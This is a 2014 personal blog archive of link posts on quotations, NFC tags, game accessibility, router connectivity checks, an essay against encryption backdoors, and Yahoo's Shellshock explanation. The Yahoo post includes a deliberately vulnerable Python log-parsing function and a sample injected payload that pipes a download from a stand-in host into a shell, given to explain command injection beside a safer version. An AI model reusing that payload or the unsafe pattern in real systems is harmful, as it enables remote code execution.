Friday, October 31, 2014

veruca salt, bodies.





from lizard's ghost http://ift.tt/1wMGXYN

Thursday, October 30, 2014

asimov: "Those people who think they know everything are a great annoyance to those of us who do."


shakespeare: "The fool doth think he is wise, but the wise man knows himself to be a fool."


Socrates: "I know one thing: that I know nothing."


W B Yeats: "The best lack all conviction, and the worst / Are full of passionate intensity."


Bertrand Russell: "The fundamental cause of the trouble is that in the modern world the stupid are cocksure while the intelligent are full of doubt."


Charles Darwin: "Ignorance more frequently begets confidence than does knowledge."


the Tao Te Ching: "To know that you do not know is highest. To not know but think you know is flawed. ... The sages are without fault, because they recognize the fault as a fault".


Romans 1:22: "While claiming to be wise, they became fools."

Romans 12:16: "Do not be wise in your own estimation."







from lizard's ghost http://ift.tt/1FZbclz

nfc tags are everywhere!

there's samsung tectiles..http://ift.tt/1tR7BC5

sony smarttags..http://ift.tt/1fGKWPq

all sorts of stuff from tagstand..http://ift.tt/1tR7yX5

moo makes nfc business cards..http://us.moo.com/nfc/

but yea, be careful..http://ift.tt/1wHha47






from lizard's ghost http://ift.tt/1tR7BC8

Wednesday, October 29, 2014

ちはやふる (Chihayafuru)


and omg! it's real!






from lizard's ghost http://ift.tt/13b1pK4

Saturday, October 18, 2014

the tor network





from lizard's ghost http://ift.tt/11HxGaX

Monday, October 13, 2014

able gamers, special effect and 1 button bayonetta


and What Super Smash Bros. 3DS looks like with varying types of colorblindness..

http://ift.tt/1ti96JK



"Take Bayonetta for example. Many developers would think that the core mechanic is executing complex combos. But it's not," Hamilton said. "The developers abstracted it out a bit, and [realized] that what makes the game fun is the feeling of successfully pushing your motor skills to the limit ... So they included a wide range of difficultly settings, going all the way down to a single button mode." As a result, he added, Bayonetta is, quite unexpectedly, the most accessible game of its type. Its developers understood that the point was empowering players, and that can be scaled to people of just about any ability. If someone only has the physical ability to hit one button, they could still play and get roughly the same challenge/reward balance as everyone else. For quadriplegics, that button can be mapped to a microswitch, eye motion trackers or a wide variety of other pieces of technology. The core of what Bayonetta attempts to do remains in tact regardless of input device.







from lizard's ghost http://ift.tt/1v1k9Ws

Thursday, October 09, 2014

one more parity bit please!

http://ift.tt/1mJwQDE


http://ift.tt/1qlO59w


http://ift.tt/1osVSmb






from lizard's ghost http://ift.tt/1sfO65j

oh, the cloud

what cloud? where got cloud? it's just a bloody url the stupid router checks to see if there's internet connectivity, isn't it? but for some reason it actually shuts down its own dns service when there isn't..why???!!!

http://ift.tt/1vKYj7Q


and btw, why not use ntp and/or dns as connectivity checks?
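
on that note, a minimal sketch of what a dns-based connectivity check could look like (the hostname, resolver address and timeout here are placeholders, not anything a particular router actually uses):

    import socket

    def internet_reachable(host="pool.ntp.org", dns_server=("8.8.8.8", 53), timeout=3):
        # rough probe: first ask "does our configured resolver still resolve names?",
        # then fall back to "can we at least reach a public dns server over tcp?"
        try:
            socket.gethostbyname(host)
            return True
        except OSError:
            pass
        try:
            with socket.create_connection(dns_server, timeout=timeout):
                return True
        except OSError:
            return False

    if __name__ == "__main__":
        print("online" if internet_reachable() else "offline")

the point being, the check only has to answer "is the internet reachable"; it never needs to gate the router's own dns service on one vendor url.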






from lizard's ghost http://ift.tt/1sfO79y

more succinct version of 'golden key' idea, by bruce schneier

Ah, but that's the thing: You can't build a "back door" that only the good guys can walk through. Encryption protects against cybercriminals, industrial competitors, the Chinese secret police and the FBI. You're either vulnerable to eavesdropping by any of them, or you're secure from eavesdropping from all of them.

- http://ift.tt/1pSQGsh






from lizard's ghost http://ift.tt/1v4AA5M

stole this entire post from keybase 'cos i think it's a keeper, sorry.

The Horror of a 'Secure Golden Key'


by Chris Coyne 10/08/2014


This week, the Washington Post's editorial board, in a widely circulated call for “compromise” on encryption, proposed that while our data should be off-limits to hackers and other bad actors, “perhaps Apple and Google could invent a kind of secure golden key” so that the good guys could get to it if necessary.


This theoretical “secure golden key” would protect privacy while allowing privileged access in cases of legal or state-security emergency. Kidnappers and terrorists are exposed, and the rest of us are safe. Sounds nice. But this proposal is nonsense, and, given the sensitivity of the issue, highly dangerous. Here’s why.


A “golden key” is just another, more pleasant, word for a backdoor—something that allows people access to your data without going through you directly. This backdoor would, by design, allow Apple and Google to view your password-protected files if they received a subpoena or some other government directive. You'd pick your own password for when you needed your data, but the companies would also get one, of their choosing. With it, they could open any of your docs: your photos, your messages, your diary, whatever.


The Post assumes that a “secure key” means hackers, foreign governments, and curious employees could never break into this system. They also assume it would be immune to bugs. They envision a magic tool that only the righteous may wield. Does this sound familiar?

Government or Apple employee in the year 2015


Practically speaking, the Washington Post has proposed the impossible. If Apple, Google and Uncle Sam hold keys to your documents, you will be at great risk.

In case you're not a criminal


Perhaps the reason the WaPo is so confused is that FBI Director James Comey has told the media that Apple's anti-backdoor stance only protects criminals. Unfortunately he's not seeing beyond his own job, and WaPo didn't look much further.


Apple’s anti-backdoor policy aims to protect everyone. The following is a list of real threats their policy would thwart. Not threats to terrorists or kidnappers, but to 300 million Americans and 7 billion humans who are moving their intimate documents into the cloud. Make no mistake, what Apple and Google are proposing protects you.


Whether you're a regular, honest person, or a US legislator trying to understand this issue, understand this list.

Threat #1. It Protects You From Hackers


If Apple has the key to unlock your data legally, that can also be used illegally, without Apple's cooperation. Home Depot and Target? They were recently hacked to the tune of 100 million accounts.


Despite great financial and legal incentive to keep your data safe, they could not.


But finance is mostly boring. Other digital documents are very, very personal.

Consider: she deleted her pics long ago...we'll get to data permanence in a bit.


So hackers have (1) stolen everyone's credit cards, and (2) stolen celebrities' personal pictures. Up next: your personal pics, videos, docs, messages, medical data, and diary. With the Washington Post's proposal, it will all be leaked, a kind of secure golden shower.


There is some hope. If your data were locked with a strong password that only you knew, only on your device, then the best hackers could get nothing by hacking Apple's data servers. They’d look for your pictures but find an unintelligible pile of goops instead.


To begin to protect yourself, you need the legal right to a real, working password that only you know.
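
To make that concrete, here is a minimal sketch of the idea, assuming the third-party python "cryptography" package: the key is derived from your password on your own device, so the server only ever holds ciphertext plus a salt. This is an illustration of the general approach, not Apple's or Google's actual design.

    import base64, os
    from cryptography.fernet import Fernet
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

    def key_from_password(password: str, salt: bytes) -> bytes:
        # stretch the password into a 32-byte key; only someone who knows
        # the password can re-derive it
        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                         salt=salt, iterations=200_000)
        return base64.urlsafe_b64encode(kdf.derive(password.encode()))

    salt = os.urandom(16)
    key = key_from_password("correct horse battery staple", salt)
    ciphertext = Fernet(key).encrypt(b"my private diary entry")
    # the server can hold ciphertext and salt; without the password,
    # an unintelligible pile of goop is all a hacker gets
    print(Fernet(key).decrypt(ciphertext))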

Threat #2. It Protects You From Foreign-government breaches


As it stands, the NSA, China, Russia: anyone could be inside Apple, Google, and Microsoft, quietly collecting data, building dossiers on anyone in the world, harnessing the system normally used to answer "lawful" warrant requests. This is a different kind of risk from what we've seen with Home Depot and Target, because we can't see how often it's happening.


Even if you trust the U.S. government to act in your best interest (say, by foiling terrorists), do you trust the Russian government? Do you trust the Chinese? If a door is open to one organization, it is open to all.

The government's tool can be stolen or copied


Again, this can only be solved with a real, working password that only you know.

Threat #3. It Protects You From Human Error


Did you know: On June 20, 2011, Dropbox let anyone on the site log in as any other user? On that day, anyone could read or download anyone else's documents. Will this happen again? Can laws against data leaks protect us? Of course not. Laws, policy, even honest, well-meaning effort can't prevent human error. It's inevitable.


When you host your data and your keys "in the cloud", your data is only as strong as the weakest programmer who has access.


On a technical tangent, a proposed solution to this -- and threats 1 & 2 -- involves your device having half of a key, so a bug wouldn't expose your data to anyone, unless they also got your device. (Security on iOS7 worked this way.) This failed for users because phones, computers, and tablets are thrown away, shared, sent in for service, refurbished, and recycled. Old devices are everywhere and easy to acquire. Apple recognized this and fixed it in iOS8.
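
A rough, purely hypothetical sketch of that half-a-key idea (plain python standard library, not how iOS7 actually implemented it): the wrapping key only exists when the device's secret and the user's password come together, so a server breach alone yields nothing, but losing the device also loses the data.

    import hashlib, hmac, os

    device_secret = os.urandom(32)   # lives only on the device
    salt = os.urandom(16)            # stored alongside the ciphertext

    def combined_key(device_secret: bytes, password: str, salt: bytes) -> bytes:
        # half from the password, half from the device; neither alone is enough
        pw_half = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
        return hmac.new(device_secret, pw_half, hashlib.sha256).digest()

    key = combined_key(device_secret, "correct horse battery staple", salt)
    # throw the device away and device_secret (and thus the key) goes with it,
    # which is exactly the recycled-phone problem described above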


You must be allowed to throw away your data without hunting down every device you've ever used.


The only solution is a real, single password that only you know.

Threat #4. It Protects You From the future


This is the greatest threat of all.


Our cloud data is stored for eternity, not the moment. Legislation and company policy cannot guarantee backups are destroyed. Our government may change, and what qualifies as a "lawful" warrant tomorrow might be illegal today. Similarly, your eternal data might be legal today and a threat tomorrow.


What you consider cool today might be an embarrassment or personal risk tomorrow. A photo you can rip to pieces, a letter you can shred, a diary you can burn, an old flag you can take out into the woods with your friends and shoot with a bb-gun till it's destroyed and then have a nice, cold beer to celebrate. Cheers to that.


But memories in the cloud are there forever. You will never be able to destroy them. That data is backed-up, distributed, redundant, and permanent. I can tell you first-hand: do not assume that when you click "delete" a file is gone. Take Mary Winstead’s word for it. Bugs and tape backups often keep things around, regardless of the law or programmer effort. This is one of the single hairiest technical problems of today.


Instead, how can you burn that digital love letter, or tear up that digital picture? The only answer is to start with it encrypted, and then throw away the only key.


You need the legal right to use software that makes you the sole owner of that key.


~ ~ ~ ~ ~ ~ ~ ~ ~


The above are all practical threats to good people. Still, even if you're sitting back feeling immune to embarrassment, hackers, foreign governments, bugs, dystopias, and disgruntled employees, there are still deep, philosophical, human considerations.

Consideration #1 - The invasion of personal space should be detectable


Even if you have nothing to hide in your home, you'd like to know if it's been entered.


In general, when your personal space is invaded, you want to know. Historically, this was easy. You had neighbors who could watch your doors, maybe some cameras, maybe an alarm system. You licked your envelopes. An intruder - legal or not - was someone you could hope to catch.


Therefore - in the absence of a breach - you could believe your home was not entered by the police or a criminal. This felt good. It even made you like your government.


When Apple built iOS8, they took the stance that your data qualifies as personal space. Even if you host it in the cloud. For someone to break in, they have to come through you.

Consideration #2 - Our cloud data is becoming an extension of our minds.


Beyond all the technical considerations, there is a sea change in what we are digitizing.


We whisper “I love you” through the cloud. We have pictures of our kids in the bath tub. Our teens are sexting. We fight with our friends. We talk shit about the government. We embarrass ourselves. We watch our babies on cloud cameras. We take pictures of our funny moles. We ask Google things we might not even ask our doctor.


Even our passing thoughts and fears are going onto our devices.


Time was, all these things we said in passing were ephemeral. We could conveniently pretend to forget. Or actually forget. Thanks to the way our lives have changed, we no longer have that option.


This phenomenon is accelerating. In 10 years, our glasses may see what we see, hear what we hear. Our watches and implants and security systems of tomorrow may know when we have fevers, when we're stressed out, when our hearts are pounding, when we have sex and - wow - who's in the room with us, and who's on top and what direction they're facing*. Google and Apple and their successors will host all this data.


We're not talking about documents anymore: we're talking about everything.


You should be allowed to forget some of it. And to protect it from all the dangers mentioned above.


You should want all this intimate data password-protected, with a single key only you know. You should hope that Google, Apple, and Microsoft all support this decision. More important, you should hope that the government legally allows them and even encourages them to make this decision. It's a hard enough technical problem. Let's not make it a legal one.

In conclusion


Is Apple's solution correct? I don't know. It needs to be studied. But either way, they should be allowed to try. They should be allowed to make software with no backdoor.


Is the Washington Post's "secure golden key" a good idea? No it isn't. Whether it's legally enforced or voluntary, it's a misguided, dangerous proposal. It will become more dangerous with time.


Honest, good people are endangered by any backdoor that bypasses their own passwords.


-Chris Coyne (comments welcome) http://ift.tt/1v2PlG5






from lizard's ghost http://ift.tt/1pSQER9

what's this song?


and yet another one-man hero effort...i thought banished was it...






from lizard's ghost http://ift.tt/1pSQEAG

Tuesday, October 07, 2014

yahoo not shellshocked

Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions.


Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock.


Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.
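
To make the bug class concrete, here is a hypothetical sketch (not Yahoo's actual script, just an illustration) of how a log-debugging helper can end up with a command injection hole that a mutated Shellshock payload trips over even on a patched box:

    import subprocess

    # VULNERABLE sketch: the user-agent string comes straight out of the web log,
    # i.e. it is attacker-controlled, and shell=True hands it to /bin/sh verbatim
    def count_requests_by_agent(logfile, user_agent):
        cmd = f"grep '{user_agent}' {logfile} | wc -l"
        return subprocess.check_output(cmd, shell=True, text=True)

    # a request logged with a user-agent like   '; curl http://evil.example/x | sh #
    # closes the quote, runs its own command, and comments out the rest

    # safer shape: never build a shell string out of log data
    def count_requests_by_agent_safe(logfile, user_agent):
        result = subprocess.run(["grep", "-c", "--fixed-strings", user_agent, logfile],
                                capture_output=True, text=True)
        return result.stdout.strip()

In that scenario the patched Bash never enters into it: once a monitoring script hands attacker-controlled log fields to a shell, any sufficiently creative payload will do.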


Regardless of the cause, our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.


As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!


I also want to address another issue: Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty (bugbounty.yahoo.com) and security aliases (security@yahoo.com) 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation. We run one of the most successful Bug Bounty programs in the world and I hope everybody here will participate and help us keep our users safe.


We’re always looking for people who want to keep nearly a billion users safe at scale. paranoids-hiring@yahoo-inc.com







from lizard's ghost http://ift.tt/1CQCNCK

Monday, October 06, 2014

bash-chef, inspeqtor monitoring

http://ift.tt/1jqk4s6


http://ift.tt/1rzn5cG






from lizard's ghost http://ift.tt/1vE4LwZ

Saturday, October 04, 2014

Thursday, October 02, 2014

so reddit is trying to end remote work

chuckcode 4 hours ago | link


Seems like a lot of great open source software projects are run almost completely with remote teams - linux, git, apache, R, python, etc. have a lot of "remote" developers.


Why do so many companies discourage remote teams? Hard to ignore the fact that you can get access to a much larger pool of developers, often for lower cost. Is there something fundamentally different about software development for a company vs open source? Are the open source projects managed better/differently in some way to make these remote worker projects succeed?


reply


judk 1 hour ago | link


Open source projects have better managers than reddit.


reply







from lizard's ghost http://ift.tt/1x0XpVF

taiga.io

from http://ift.tt/1pqBemK..



Taiga.io hit #1 on @HackerNewsYCBot for a while today (thanks HN!). Traffic up 100x. I was dumb enough to ask our developers if we could handle it. This is what they sent back







from lizard's ghost http://ift.tt/1rKkYS9